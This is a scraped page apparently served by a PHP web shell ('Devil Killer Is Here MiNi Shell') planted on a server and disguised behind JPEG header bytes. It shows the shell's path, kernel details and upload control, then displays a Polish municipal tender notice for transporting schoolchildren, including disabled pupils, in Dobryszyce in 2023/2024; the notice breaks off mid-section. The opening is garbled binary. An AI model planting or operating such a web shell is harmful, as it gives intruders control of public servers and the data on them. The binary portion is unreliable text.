JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230724/0032214501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz i odwóz dzieci przedszkolnych i uczniów do ZSP w Dobryszycach, SP w Bloku Dobryszyce, Specjalnego Ośrodka Szkolno–Wychowawczego, Przedszkola Specjalnego w Radomsku w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dobryszyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590647977</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobryszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">446811193</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">446811028</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@dobryszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://dobryszyce.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz i odwóz dzieci przedszkolnych i uczniów do ZSP w Dobryszycach, SP w Bloku Dobryszyce, Specjalnego Ośrodka Szkolno–Wychowawczego, Przedszkola Specjalnego w Radomsku w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bcec1afe-2a0f-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00322145</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00050818/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 ,,Swiadczenie usług transportowych w zakresie dowozu i odwozu uczniów do (z) szkół/placówek łącznie ze sprawowaniem opieki nad uczniami podczas wykonywania usługi&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bcec1afe-2a0f-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej:przetargi@dobryszyce.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający zaleca Wykonawcy posługiwaniem się numerem ogłoszenia (BZP) lub ID postępowania lub znakiem sprawy.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną<br/>a.	za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>	lub<br/>b.	za pośrednictwem poczty elektronicznej: przetargi@dobryszyce.pl<br/>Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików. <br/>Wykonawca dodaje wybrany z dysku i uprzednio podpisany „Formularz oferty” w pierwszym polu („Wypełniony formularz oferty”). W kolejnym polu („Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”) wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z ofertą . <br/>Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym . Rekomendowanym wariantem podpisu jest typ wewnętrzny. Podpis formularza ofertowego wariantem podpisu w typie zewnętrznym również jest możliwy, tylko w tym przypadku, powstały oddzielny plik podpisu dla tego formularza należy załączyć w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”. \<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>Osoba uprawniona przez Zamawiającego do porozumiewania się z Wykonawcami w kwestiach<br/>formalnych i merytorycznych – Tomasz Bąk e-mail: przetargi@dobryszyce.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna o przetwarzaniu danych osobowych w postępowaniu o udzielenie zamówienia publicznego.<br/><br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „ RODO ”, informuję, że: <br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Dobryszyce reprezentowana <br/> przez Wójta Gminy.<br/> Dane tele-adresowe Zamawiającego:<br/> Gmina Dobryszyce ul. Wolności 8, 97-505 Dobryszyce<br/> Adres e-mail: gmina@dobryszyce.pl<br/> Tel. 44/ 681 11 93<br/>2. Inspektorem Ochrony Danych Osobowych w Gminie Dobryszyce jest pani Magdalena <br/> Kuszmider tel. 607 770 718, e-mail: magdalena@kuszmider.com.pl.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym <br/> w trybie podstawowym pn.: „ Dowóz i odwóz dzieci przedszkolnych i uczniów do Zespołu <br/> Szkolno – Przedszkolnego w Dobryszycach, Szkoły Podstawowej w Bloku Dobryszyce, <br/> Specjalnego Ośrodka Szkolno – Wychowawczego, Przedszkola Specjalnego w Radomsku <br/> w roku szkolnym 2023/2024”. Znak sprawy: ZP.271.1.5.2023.<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy z dnia 11 <br/> września 2019r. – Prawo zamówień publicznych (Dz. U. 2022 poz. 1710ze zm.), dalej <br/> „ustawa Pzp”, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/> a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, <br/> okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/> zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; <br/> udostępnianie danych, o którym mowa w art. 74 ust. 1 i 2 ustawy Pzp ma zastosowanie do <br/> wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO <br/> (szczególne kategorie danych osobowych) zebranych w toku postępowania o udzielenie <br/> zamówienia; dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące <br/> wyroków skazujących i naruszeń prawa), Administrator (Zamawiający) udostępnia w celu <br/> umożliwienia korzystania ze środków ochrony prawnej, do upływu terminu na ich <br/> wniesienie.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/> dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/> z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje <br/> niepodania określonych danych wynikają z ustawy Pzp.<br/>Pozostałe informacje dot. RODO zostały zawarte w punkcie 22 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I zamówienia – Dowóz i odwóz uczniów do Zespołu Szkolno – Przedszkolnego w Dobryszycach, Szkoły Podstawowej w Bloku Dobryszyce. W ramach Części I zamówienia, Wykonawca zobowiązany jest do dostarczenia na własny koszt biletów miesięcznych dla uprawnionych uczniów do korzystania z usługi dowozu i odwozu. <br/>Ilość kupowanych biletów miesięcznych w okresie roku szkolnego 2023/2024 może ulegać zmianie. W przypadku zmniejszenia lub zwiększenia liczby uczniów dowożonych/odwożonych w danym miesiącu przez Wykonawcę łączne wynagrodzenie miesięczne Wykonawcy ulegnie odpowiednio zmniejszeniu lub zwiększeniu.<br/>Bilet miesięczny jest biletem imiennym i posługiwać może się nim osoba, której imię i nazwisko widnieje na bilecie. W razie kontroli wymagane jest przedstawienie dokumentu potwierdzającego tożsamość posiadacza biletu. Bilet miesięczny ważny jest jeden miesiąc tj.: od pierwszego do ostatniego dnia danego miesiąca. Na bilety miesięczne obowiązują wszystkie ulgi ustawowe przewidziane dla komunikacji samochodowej. W okresie ferii zimowych ceny biletów miesięcznych zmniejszone będą o 50%. <br/>Wykonawca zobowiązuje się do dowozu i odwozu uczniów do(ze) szkoły zgodnie z wykazem stanowiącym Załącznik Nr 10 do SWZ. Zamawiający zapłaci tylko za wykonanie usługi na trasach ujętych w wykazie, nie przewiduje się dodatkowych opłat za dojazdy na miejsce wykonywania usługi. Przedmiot zamówienia nie obejmuje dojazdu autobusu przeznaczonego do realizacji usługi z bazy Wykonawcy na miejsce wykonywania usługi.<br/>Wykonawca winien dowieźć uczniów na zajęcia nie wcześniej niż 30 minut przed ich rozpoczęciem i nie później niż 5 minut przed ich rozpoczęciem. Określenie godzin dowozu i odwozu Wykonawca ustali z Dyrektorami szkół. <br/>W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zobowiązany jest zapewnić przewóz zgodnie z harmonogramem ustalonym na dzień odpracowania zajęć. Przejazdy uczniów należy zapewnić w dni przewidziane organizacją przedszkola i szkoły w roku szkolnym 2023/2024, począwszy od dnia podpisania umowy, nie wcześniej jednak niż od dnia 04 września 2023 roku do dnia 21 czerwca 2024 roku z wyłączeniem ferii zimowych i wiosennych oraz przerw w nauce wynikających z kalendarza roku szkolnego 2023/2024.<br/>Przedmiot zamówienia zostanie wykonany przy użyciu autobusów w ilości 2 szt. stanowiących własność Wykonawcy. Przewozy dzieci odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy z dnia 20 czerwca 1997 roku – Prawo o ruchu drogowym ( t.j. Dz. U. z 2023 r., poz. 1047 ) i innymi przepisami związanymi z przewozem osób w szczególności zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym<br/>( t.j. Dz. U. z 2022 r., poz. 2201 ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34980000-0 - Bilety przewozowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie odrzuconych na <br/> podstawie art. 226 Pzp. <br/>Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi <br/> kryteriami:<br/><br/>W odniesieniu do Części I zamówienia:<br/><br/>Nazwa kryterium:<br/>1. Cena miesięczna brutto za wykonanie przedmiotu zamówienia, Waga kryterium (%) Maksymalna liczba punktów 60% ( 60 pkt )<br/>2. Czas podstawienia pojazdu zastępczego podany w minutach (K2) - z zastrzeżeniem pkt 17.3.3. SWZ, Waga kryterium (%) Maksymalna liczba punktów 40% ( 40 pkt )<br/><br/>Kryterium „Cena” ( C ) - waga 60 % :<br/><br/>Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Formularzu Ofertowym. <br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/><br/>Liczba zdobytych punktów ( C ) = Cn miesięczna brutto/Cb miesięczna brutto x 100 x waga kryterium 60% <br/>gdzie: <br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>60% - procentowe znaczenie kryterium ceny<br/><br/>Kryterium „ Czas podstawienia pojazdu zastępczego w razie awarii podany w minutach ( K2 ) ”- waga 40%<br/><br/>W kryterium „ Czas podstawienia pojazdu zastępczego w razie awarii ” w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najlepszy wskaźnik ( najkrótszy czas podstawienia pojazdu zastępczego w razie awarii z zastrzeżeniem minimalnego czasu podstawienia pojazdu do 20 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu oraz maksymalnego czasu podstawienia pojazdu do 40 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu ), zostanie przyznana następująca punktacja:<br/>a)	oferowany czas podstawienia pojazdu zastępczego w razie awarii – do 20 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu – 100 x waga kryterium (40,00%) – 40,00 punktów;<br/>b)	oferowany czas podstawienia pojazdu zastępczego w razie awarii – do 30 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu – 50 x waga kryterium (40,00%) – 20,00 punktów;<br/>c)	oferowany czas podstawienia pojazdu zastępczego w razie awarii – do 40 minut od telefonicznego powiadomienia Wykonawcy o awarii pojazdu – 0 x waga kryterium (40,00%) – 0,00 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii podany w minutach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia – Dowóz i odwóz uczniów do Specjalnego Ośrodka Szkolno – Wychowawczego, Przedszkola Specjalnego w Radomsku. W ramach Części II zamówienia, Wykonawca zobowiązany jest do dowozu i odwozu uczniów niepełnosprawnych zgodnie z wykazem stanowiącym Załącznik Nr 11 do SWZ. <br/>Przejazdy uczniów należy zapewnić w dni przewidziane organizacją przedszkola i szkoły w roku szkolnym 2023/2024, począwszy od dnia podpisania umowy, nie wcześniej jednak niż od dnia 04 września 2023 roku do dnia 21 czerwca 2024 roku.<br/>Wykonawca musi dysponować kierowcą do realizacji zamówienia, przy czym kierowca musi posiadać stosowne uprawnienia, tj.: ważne prawo jazdy właściwej kategorii, ważne świadectwo kwalifikacji lub zaświadczenie o ukończeniu kursu dokształcającego kierowców przewożących osoby. Wykonawca podczas świadczenia każdego przewozu uczniów zobowiązany jest zapewnić dodatkowo poza kierowcą, także opiekuna. Zamawiający wyklucza możliwość łączenia funkcji kierowcy i opiekuna. Funkcję opiekuna może sprawować osoba pełnoletnia, która jest zdolna do ponoszenia odpowiedzialności karnej, cywilnej za działanie lub zaniechanie w związku ze sprawowaną opieką.<br/>Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: zapewnienia bezpieczeństwa w trakcie przewozu uczniów do szkoły/przedszkola, zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu uczniów, opieki i zwracania uwagi na właściwe zachowanie się uczniów w pojeździe, a w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów w pojeździe, niedopuszczenie do dalszego przewozu, sprawdzenie stanu liczbowego uczniów. Zasady sprawowania opieki zawarte zostały w Załączniku Nr 9 do SWZ. <br/><br/>Wykonawca zobowiązany jest posiadać samochód ( bus specjalistyczny ) dostosowany do przewozu osób niepełnosprawnych.<br/>Przewozy osób niepełnosprawnych odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy z dnia 20 czerwca 1997 roku – Prawo o ruchu drogowym ( t.j. Dz. U. z 2023 r., poz. 1047 ) i innymi przepisami związanymi z przewozem osób w szczególności zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym ( t.j. Dz. U. z 2022 r., poz. 2201 ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny 